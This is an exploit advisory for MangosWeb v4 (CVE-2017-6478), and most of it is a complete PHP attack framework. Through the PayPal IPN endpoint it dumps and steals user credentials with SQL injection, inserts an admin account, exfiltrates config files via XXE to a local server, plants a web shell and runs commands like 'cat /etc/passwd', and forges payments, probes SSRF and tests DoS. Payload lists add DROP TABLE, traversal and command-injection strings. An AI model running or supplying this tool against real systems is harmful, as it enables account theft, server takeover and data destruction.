=============================================================================================================================================
| # Title : MaNGOSWeb V4 4.0.6 MangosWeb v4 Multi-Exploit Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/ipn.php |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478
[+] Summary : A comprehensive penetration testing tool designed to identify and exploit multiple critical vulnerabilities in MangosWeb v4, a World of Warcraft emulator web interface.
[+] Core Components :
Multi-Vector Attack Framework
SQL Injection exploitation via PayPal IPN
XXE (XML External Entity) attacks via RSS feed
File Write vulnerabilities leading to RCE
Host Header Injection for SSRF/phishing
CSRF (Cross-Site Request Forgery) attacks
DoS (Denial of Service) testing
[+] POC :
<?php
/*
===================================================
Author: indoushka
Target: MangosWeb v4 (PayPal IPN & RSS)
Usage: php exploit.php http://target.com
===================================================
*/
/**
 * Proof-of-concept driver for the MangosWeb v4 issues listed in the advisory above.
 *
 * Every attack method posts unauthenticated form data to /paypal_ipn.php and relies
 * on that handler acting on the fields it receives; the XXE and DoS steps then fetch
 * /rss.php to trigger whatever was stored. Defender note: the mitigations this kind
 * of report calls for are verifying IPN notifications with PayPal before acting on
 * them, parameterising every query that touches IPN fields, and disabling external
 * entity resolution in the XML parser behind the RSS feed.
 *
 * A single cURL handle is shared by all methods, and options set through
 * curl_setopt_array() stay on the handle between calls, so what each step sends
 * depends on which method ran before it (e.g. the X-Forwarded-For header set by
 * exploit_paypal_sqli() remains until another call replaces CURLOPT_HTTPHEADER).
 *
 * Side effects on the machine running the tool: files are written to the current
 * directory (xxe.dtd, sqli_result_*.txt, stolen_accounts.txt, exploitation_report.txt)
 * and exploit_rss_xxe() starts a background HTTP server that serves that directory.
 */
class MangosWebExploit {
// Target base URL with any trailing slash removed.
private $target;
// Same value as $target; never read anywhere in this class.
private $base_url;
// Findings recorded so far; only the 'endpoints' key is ever written.
private $results = [];
// Shared cURL handle, released in __destruct().
private $session;
/**
 * Prepares the shared cURL handle and prints the banner.
 *
 * Certificate and hostname verification are switched off, so the tool will talk to
 * any TLS endpoint, including one interposed on the path; the 15 second timeout and
 * redirect-following apply to every later request.
 *
 * @param string $url base URL of the target; a trailing slash is stripped
 */
public function __construct($url) {
$this->target = rtrim($url, '/');
$this->base_url = $this->target;
$this->session = curl_init();
// cURL defaults for the shared handle
curl_setopt_array($this->session, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 15,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
echo "===========================================\n";
echo "MangosWeb v4 Exploitation Framework Started\n";
echo "Target: {$this->target}\n";
echo "===========================================\n\n";
}
// 1. Endpoint discovery
/**
 * GETs a fixed list of paths and records those answering HTTP 200.
 *
 * Redirects are followed (CURLOPT_FOLLOWLOCATION), so a path that redirects to a
 * 200 page is counted as found.
 *
 * @return array|null map of path => true; null (with an undefined-key warning) when
 *                    no path answered 200, because the key is never initialised
 */
public function discover_paths() {
echo "[*] Scanning for vulnerable endpoints...\n";
$endpoints = [
'/paypal_ipn.php',
'/rss.php',
'/index.php',
'/admin/',
'/core/cache/rss/news.xml',
'/config/config-protected.php',
'/install/',
'/donate.php'
];
foreach ($endpoints as $endpoint) {
$url = $this->target . $endpoint;
curl_setopt($this->session, CURLOPT_URL, $url);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
echo "[+] Found: {$endpoint}\n";
$this->results['endpoints'][$endpoint] = true;
}
}
return $this->results['endpoints'];
}
// 2. PayPal IPN SQL injection
/**
 * Posts four UNION-based payloads in the txn_id field of an IPN message.
 *
 * A response longer than 100 bytes is counted as a success for that payload and
 * saved verbatim to sqli_result_<type>.txt in the current directory; an ordinary
 * HTML error page satisfies the same check, so the "successful" message is not
 * evidence on its own. The X-Forwarded-For header added here stays on the shared
 * handle for later requests until another call replaces CURLOPT_HTTPHEADER.
 */
public function exploit_paypal_sqli() {
echo "\n[*] Exploiting PayPal IPN SQL Injection...\n";
$payloads = [
// server version, current user and database name
"1' UNION SELECT 1,2,3,4,5,6,7,8,@@version,10,user(),database() -- -" => "db_info",
// table names in the current schema
"1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11 FROM information_schema.tables WHERE table_schema=database() -- -" => "tables",
// column names of mw_accounts
"1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name),10,11 FROM information_schema.columns WHERE table_name='mw_accounts' -- -" => "mw_accounts_columns",
// first ten account rows
"1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,':',password,':',email),10,11 FROM mw_accounts LIMIT 0,10 -- -" => "accounts"
];
$ipn_url = $this->target . '/paypal_ipn.php';
foreach ($payloads as $payload => $type) {
$post_data = [
'txn_id' => $payload,
'item_name' => 'VIP Package --- Account: admin(#1)',
'item_number' => '1',
'payer_email' => '[email protected]',
'payment_type' => 'instant',
'payment_status' => 'Completed',
'mc_gross' => '100.00',
'custom' => 'exploit'
];
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'X-Forwarded-For: 173.0.82.126' // address the author labels as PayPal's; persists on the handle
]
]);
$response = curl_exec($this->session);
if (strlen($response) > 100) {
echo "[+] SQL Injection successful for: {$type}\n";
// save the raw response
$filename = "sqli_result_{$type}.txt";
file_put_contents($filename, $response);
echo " [*] Saved to: {$filename}\n";
// count what the response appears to contain
$this->parse_sqli_results($response, $type);
}
}
}
// 3. XXE via the RSS feed
/**
 * Attempts XXE through the RSS feed in three steps: writes a parameter-entity DTD to
 * ./xxe.dtd, posts a stacked-query payload in item_number that stores a DOCTYPE
 * referencing that DTD in mw_news, then starts the local server and fetches /rss.php.
 *
 * Both the DTD and the DOCTYPE point back at whatever $_SERVER['HTTP_HOST'] holds
 * on the machine running this tool. Success is reported when the feed body contains
 * 'PD9waHA', the base64 prefix of '<?php'. The IPN response itself is not examined.
 */
public function exploit_rss_xxe() {
echo "\n[*] Exploiting RSS XXE Vulnerability...\n";
// parameter-entity DTD; %file reads the config through the base64 filter
$dtd_content = '<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=config/config-protected.php">
<!ENTITY % param "<!ENTITY % exfil SYSTEM \'http://' . $_SERVER['HTTP_HOST'] . '/exfil?data=%file;\'>">
%param;';
// written to the current directory, which start_exfiltration_server() serves
file_put_contents('xxe.dtd', $dtd_content);
// XXE Payload
$xxe_payload = '<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % remote SYSTEM "http://' . $_SERVER['HTTP_HOST'] . '/xxe.dtd">
%remote;
%exfil;
]>
<test>XXE Test</test>';
// stacked query that stores the DOCTYPE in the news table
$payload = "1'); UPDATE mw_news SET message='" . addslashes($xxe_payload) . "' WHERE id=1; -- ";
$post_data = [
'txn_id' => 'xxe_inject',
'item_name' => 'XXE Test --- Account: admin(#1)',
'item_number' => $payload,
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
// local HTTP server for the DTD and the exfil callback
$this->start_exfiltration_server();
// fetch the feed so the stored DOCTYPE gets parsed
$rss_url = $this->target . '/rss.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $rss_url,
CURLOPT_POST => false
]);
$rss_response = curl_exec($this->session);
if (strpos($rss_response, 'PD9waHA') !== false) {
echo "[+] XXE Successful! Config file exfiltrated.\n";
}
}
// 4. RCE via File Write
/**
 * Posts two INTO OUTFILE payloads in txn_id, then probes three URLs for a shell.
 *
 * If a probe body contains 'uid=' or 'www-data' the tool runs four fixed commands
 * through that URL, prints the first 500 bytes of each result and returns true.
 * The match is a plain substring test on the response body.
 *
 * @return bool true on the first probe that matched, false when none did
 */
public function exploit_file_write_rce() {
echo "\n[*] Attempting RCE via File Write...\n";
$php_shell = base64_encode('<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>');
$payloads = [
// write a file under the web root with INTO OUTFILE
"1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php system(\$_GET[cmd]); ?>',10,11 INTO OUTFILE '/var/www/html/shell.php' -- -",
// same, targeting the RSS cache path
"1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php eval(\$_POST[a]); ?>',10,11 INTO OUTFILE '" . $this->target . "/core/cache/rss/shell.php' -- -"
];
foreach ($payloads as $index => $payload) {
$post_data = [
'txn_id' => $payload,
'item_name' => 'RCE Shell --- Account: admin(#1)',
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
echo "[.] Attempted RCE payload {$index}\n";
// probe for the written file
$shell_urls = [
$this->target . '/shell.php?cmd=id',
$this->target . '/core/cache/rss/shell.php',
$this->target . '/core/cache/rss/news.xml'
];
foreach ($shell_urls as $shell_url) {
curl_setopt_array($this->session, [
CURLOPT_URL => $shell_url,
CURLOPT_POST => false
]);
$shell_test = curl_exec($this->session);
if (strpos($shell_test, 'uid=') !== false ||
strpos($shell_test, 'www-data') !== false) {
echo "[+] RCE SUCCESSFUL! Shell at: {$shell_url}\n";
// run a fixed command list through the shell
$commands = [
'whoami',
'pwd',
'ls -la',
'cat /etc/passwd'
];
foreach ($commands as $cmd) {
$cmd_url = $shell_url . (strpos($shell_url, '?') ? '&' : '?') . 'cmd=' . urlencode($cmd);
curl_setopt($this->session, CURLOPT_URL, $cmd_url);
$result = curl_exec($this->session);
echo "\n[Command]: {$cmd}\n";
echo "[Result]: " . substr($result, 0, 500) . "\n";
}
return true;
}
}
}
return false;
}
// 5. Host header injection against the RSS feed
/**
 * Requests /rss.php once per entry of a fixed Host / X-Forwarded-Host list, each
 * sent as a custom header that replaces whatever CURLOPT_HTTPHEADER held before.
 *
 * Success is reported when the response body echoes 'evil.com' or '127.0.0.1';
 * the AWS metadata message is printed only when that check passed and the header
 * that was sent names 169.254.169.254.
 */
public function exploit_host_injection() {
echo "\n[*] Exploiting Host Header Injection...\n";
$malicious_headers = [
'Host: evil.com',
'Host: 127.0.0.1:3306',
'Host: 169.254.169.254/latest/meta-data/', // AWS Metadata
'Host: localhost:22',
'X-Forwarded-Host: internal.admin.panel'
];
$rss_url = $this->target . '/rss.php';
foreach ($malicious_headers as $header) {
curl_setopt_array($this->session, [
CURLOPT_URL => $rss_url,
CURLOPT_POST => false,
CURLOPT_HTTPHEADER => [$header]
]);
$response = curl_exec($this->session);
if (strpos($response, 'evil.com') !== false ||
strpos($response, '127.0.0.1') !== false) {
echo "[+] Host Injection successful with: {$header}\n";
// SSRF indicator
if (strpos($header, '169.254.169.254') !== false) {
echo "[!] Possible AWS Metadata exposure!\n";
}
}
}
}
// 6. CSRF attack - forged transactions
/**
 * Sends three forged "Completed" IPN messages naming the given account id.
 *
 * Each message carries a random txn_id and amount and a Referer header claiming to
 * come from paypal.com. The response is ignored; every message is printed as sent.
 *
 * @param int $victim_account_id account number placed in item_name (default 1)
 */
public function exploit_csrf($victim_account_id = 1) {
echo "\n[*] Launching CSRF Attack...\n";
for ($i = 0; $i < 3; $i++) {
$txn_id = 'CSRF' . time() . rand(1000,9999);
$post_data = [
'txn_id' => $txn_id,
'item_name' => "Free Premium --- Account: victim(#{$victim_account_id})",
'item_number' => '999',
'payer_email' => '[email protected]',
'payment_type' => 'instant',
'payment_status' => 'Completed',
'mc_gross' => rand(50, 500) . '.00',
'mc_currency' => 'USD',
'payment_date' => date('H:i:s M d, Y T')
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'Referer: https://www.paypal.com/'
]
]);
$response = curl_exec($this->session);
echo "[+] Sent fake transaction: {$txn_id}\n";
}
}
// 7. DOS Attack
/**
 * Builds an RSS document of roughly 5 MB (5000 items of 1000 'A's), posts it inside a
 * payload in item_number, then fetches /rss.php ten times and reports the total time.
 *
 * More than five seconds for the ten requests is printed as "vulnerable"; this is a
 * coarse heuristic that ordinary network latency can also exceed.
 */
public function exploit_dos() {
echo "\n[*] Testing DoS vulnerability...\n";
// build the large RSS body
$large_xml = '<?xml version="1.0"?><rss><channel>';
for ($i = 0; $i < 5000; $i++) {
$large_xml .= '<item><title>' . str_repeat('A', 1000) . '</title></item>';
}
$large_xml .= '</channel></rss>';
// payload wrapping the large body
$cache_payload = "1')); ?>" . $large_xml . "<?php //";
$post_data = [
'txn_id' => 'dos_attack',
'item_name' => 'DoS Test --- Account: admin(#1)',
'item_number' => $cache_payload,
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
curl_exec($this->session);
// repeated fetches, timed as a whole
$rss_url = $this->target . '/rss.php';
$start_time = microtime(true);
for ($i = 0; $i < 10; $i++) {
curl_setopt($this->session, CURLOPT_URL, $rss_url);
curl_exec($this->session);
echo ".";
}
$total_time = microtime(true) - $start_time;
echo "\n[+] DoS test completed in {$total_time} seconds\n";
if ($total_time > 5) {
echo "[!] Server is vulnerable to DoS attacks\n";
}
}
// 8. Add an administrator account
/**
 * Posts a stacked INSERT into mw_accounts with gmlevel 3.
 *
 * The username and email carry a rand() suffix; the stored password is the MD5 of a
 * fixed string, which is why the plaintext is printed afterwards. The success message
 * is printed without inspecting the response.
 */
public function add_admin_user() {
echo "\n[*] Adding admin user to database...\n";
$username = 'hacker_' . rand(1000,9999);
$password = md5('Password123!');
$email = 'hacker' . rand(100,999) . '@evil.com';
$payload = "1'); INSERT INTO mw_accounts (username, password, email, gmlevel, joindate) VALUES ('{$username}', '{$password}', '{$email}', '3', NOW()); -- ";
$post_data = [
'txn_id' => 'add_admin',
'item_name' => 'Add User --- Account: admin(#1)',
'item_number' => $payload,
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
echo "[+] Admin user added:\n";
echo " Username: {$username}\n";
echo " Password: Password123!\n";
echo " Email: {$email}\n";
echo " GM Level: 3 (Administrator)\n";
}
// 9. Account theft
/**
 * Posts a UNION payload that concatenates account rows behind an 'ACCOUNT:' marker,
 * then parses the response with a regex and writes matches to ./stolen_accounts.txt.
 *
 * Nothing is printed or written when the regex finds no match.
 */
public function steal_accounts() {
echo "\n[*] Stealing user accounts...\n";
$payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT('ACCOUNT:',username,':',password,':',email,':',gmlevel),10,11 FROM mw_accounts -- -";
$post_data = [
'txn_id' => $payload,
'item_name' => 'Steal Accounts --- Account: admin(#1)',
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
if (preg_match_all('/ACCOUNT:([^:]+):([^:]+):([^:]+):([^:]+)/', $response, $matches)) {
echo "[+] Stolen Accounts:\n";
$accounts_file = 'stolen_accounts.txt';
$file_content = "Stolen Accounts from {$this->target}\n";
$file_content .= "====================================\n\n";
for ($i = 0; $i < count($matches[0]); $i++) {
$username = $matches[1][$i];
$password = $matches[2][$i];
$email = $matches[3][$i];
$gmlevel = $matches[4][$i];
echo " {$username} : {$password} : {$email} (GM: {$gmlevel})\n";
$file_content .= "Username: {$username}\n";
$file_content .= "Password: {$password}\n";
$file_content .= "Email: {$email}\n";
$file_content .= "GM Level: {$gmlevel}\n";
$file_content .= "---\n";
}
file_put_contents($accounts_file, $file_content);
echo "\n[+] Accounts saved to: {$accounts_file}\n";
}
}
// 10. Auto Pwn - run every attack in sequence
/**
 * Runs the nine attack methods in a fixed order with a two second pause after each,
 * then writes the report.
 *
 * Only Exception is caught; a PHP Error (TypeError and the like) escapes the loop.
 * The "COMPLETED SUCCESSFULLY" banner and the report are produced regardless of what
 * any step observed.
 */
public function auto_pwn() {
echo "\n[*] Starting AUTO-PWN sequence...\n";
$steps = [
'discover_paths',
'exploit_paypal_sqli',
'steal_accounts',
'add_admin_user',
'exploit_rss_xxe',
'exploit_host_injection',
'exploit_file_write_rce',
'exploit_csrf',
'exploit_dos'
];
foreach ($steps as $step) {
echo "\n[=== Step: {$step} ===]\n";
try {
$this->$step();
sleep(2); // pause between steps
} catch (Exception $e) {
echo "[!] Error in {$step}: " . $e->getMessage() . "\n";
}
}
echo "\n========================================\n";
echo "[✔] AUTO-PWN COMPLETED SUCCESSFULLY!\n";
echo "========================================\n";
// write the summary file
$this->generate_report();
}
// Helpers
/**
 * Counts regex matches in a response for dotted version numbers, mw_* table names
 * and username:md5:email triples, printing each count.
 *
 * @param string $response raw body returned by the IPN endpoint
 * @param string $type payload label; accepted but unused
 */
private function parse_sqli_results($response, $type) {
$patterns = [
'mysql' => '/[0-9]+\.[0-9]+\.[0-9]+/',
'tables' => '/(mw_[a-z_]+)/',
'accounts' => '/([a-zA-Z0-9_]+):([a-f0-9]{32}):([^:]+)/'
];
foreach ($patterns as $pattern_type => $pattern) {
if (preg_match_all($pattern, $response, $matches)) {
echo " [*] Found {$pattern_type}: " . count($matches[0]) . " items\n";
}
}
}
/**
 * Starts PHP's built-in web server on 0.0.0.0:8888 in the background via exec(),
 * serving the current directory.
 *
 * Because that directory also receives every file this tool writes, those files are
 * reachable from any interface while the server runs; nothing stops the server
 * afterwards, and the exec() result is not checked.
 */
private function start_exfiltration_server() {
// simple receiver for the XXE callback
$port = 8888;
echo "[*] Starting exfiltration server on port {$port}...\n";
// the author notes this could run in a separate thread;
// this is the simplified form
$cmd = "php -S 0.0.0.0:{$port} -t . > /dev/null 2>&1 &";
exec($cmd);
}
/**
 * Writes ./exploitation_report.txt.
 *
 * The "Vulnerabilities Found" section is a hard-coded list; $this->results is never
 * consulted, so the report claims all six issues regardless of what the run observed.
 * The "Files Created" section lists every *.txt in the current directory, not only
 * files this tool produced.
 */
private function generate_report() {
$report = "MangosWeb v4 Exploitation Report\n";
$report .= "Generated: " . date('Y-m-d H:i:s') . "\n";
$report .= "Target: {$this->target}\n";
$report .= "=====================================\n\n";
$report .= "Vulnerabilities Found:\n";
$report .= "1. SQL Injection (Critical)\n";
$report .= "2. XXE Injection (Critical)\n";
$report .= "3. RCE via File Write (Critical)\n";
$report .= "4. Host Header Injection (High)\n";
$report .= "5. CSRF (Medium)\n";
$report .= "6. DoS (Medium)\n\n";
$report .= "Files Created:\n";
$files = glob('*.txt');
foreach ($files as $file) {
$report .= "- {$file}\n";
}
file_put_contents('exploitation_report.txt', $report);
echo "[+] Report saved to: exploitation_report.txt\n";
}
/** Releases the shared cURL handle. */
public function __destruct() {
curl_close($this->session);
}
}
// Entry point. Under the CLI SAPI the target and mode come from argv; under any
// other SAPI the script renders an HTML form and runs the selected mode against
// whatever URL was POSTed. The web path performs no authentication, so any client
// able to reach this script can make the host it runs on issue these requests.
if (php_sapi_name() === 'cli') {
if ($argc < 2) {
echo "Usage: php exploit.php http://target.com [mode]\n";
echo "Modes:\n";
echo " auto - Full auto exploitation (default)\n";
echo " sql - SQL Injection only\n";
echo " rce - RCE attempts only\n";
echo " csrf - CSRF attacks only\n";
exit(1);
}
$target = $argv[1];
// 'dos' is accepted below although the usage text does not list it
$mode = $argv[2] ?? 'auto';
$exploit = new MangosWebExploit($target);
switch ($mode) {
case 'sql':
$exploit->exploit_paypal_sqli();
$exploit->steal_accounts();
break;
case 'rce':
$exploit->exploit_file_write_rce();
break;
case 'csrf':
$exploit->exploit_csrf();
break;
case 'dos':
$exploit->exploit_dos();
break;
case 'auto':
default:
$exploit->auto_pwn();
break;
}
} else {
// Web interface: the form is emitted first, then the POST (if any) is handled
echo '<!DOCTYPE html>
<html>
<head>
<title>MangosWeb v4 Exploit</title>
<style>
body { font-family: Arial; margin: 20px; }
.container { max-width: 800px; margin: auto; }
input, select { padding: 8px; margin: 5px; }
button { background: #d00; color: white; padding: 10px 20px; border: none; cursor: pointer; }
.result { background: #f5f5f5; padding: 15px; margin: 10px 0; }
</style>
</head>
<body>
<div class="container">
<h2>MangosWeb v4 Exploitation Tool</h2>
<form method="POST">
<input type="url" name="target" placeholder="http://target.com" size="50" required>
<select name="mode">
<option value="auto">Auto Pwn</option>
<option value="sql">SQL Injection</option>
<option value="rce">Remote Code Execution</option>
<option value="csrf">CSRF Attack</option>
<option value="dos">DoS Test</option>
</select>
<button type="submit">Launch Attack</button>
</form>';
// Only the presence of 'target' is checked; the value is used as given.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['target'])) {
echo '<div class="result"><pre>';
// Tool output is buffered so it can be HTML-escaped before being sent back.
ob_start();
$exploit = new MangosWebExploit($_POST['target']);
// An absent or unknown mode falls through to auto_pwn().
switch ($_POST['mode']) {
case 'sql':
$exploit->exploit_paypal_sqli();
$exploit->steal_accounts();
break;
case 'rce':
$exploit->exploit_file_write_rce();
break;
case 'csrf':
$exploit->exploit_csrf();
break;
case 'dos':
$exploit->exploit_dos();
break;
default:
$exploit->auto_pwn();
}
$output = ob_get_clean();
echo htmlspecialchars($output);
echo '</pre></div>';
}
echo '</div></body></html>';
}
?>
************** # server_config.py**************
# server_config.py
# Static settings and payload strings. Nothing on this page reads this dict;
# the PHP tool above carries its own hard-coded payloads.
EXPLOIT_CONFIG: dict[str, object] = {
'target': 'http://victim.com',  # placeholder value
'timeout': 30,
'threads': 5,
'payloads_file': 'payloads.txt',
'output_dir': 'results',
'sql_payloads': [
"' UNION SELECT @@version --",
"' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd') --",
# destructive rather than diagnostic: drops the accounts table
"'); DROP TABLE mw_accounts; --"
],
'xxe_payloads': [
'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>',
# 'ATTACKER' is a placeholder host name, not a value set anywhere on this page
'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY % remote SYSTEM "http://ATTACKER/xxe.dtd">%remote;]>'
]
}
**************************************
payloads.txt
-- SQL Injection Payloads
' OR '1'='1
' UNION SELECT NULL,NULL,NULL,NULL
'); INSERT INTO mw_accounts VALUES ('hacker',MD5('pass'),'[email protected]','3',NOW()) --
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
-- File Path Traversal
../../../../etc/passwd
../config.php
/var/www/html/config.php
C:\Windows\System32\drivers\etc\hosts
-- Command Injection
;id;
| whoami
`cat /etc/passwd`
$(uname -a)
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================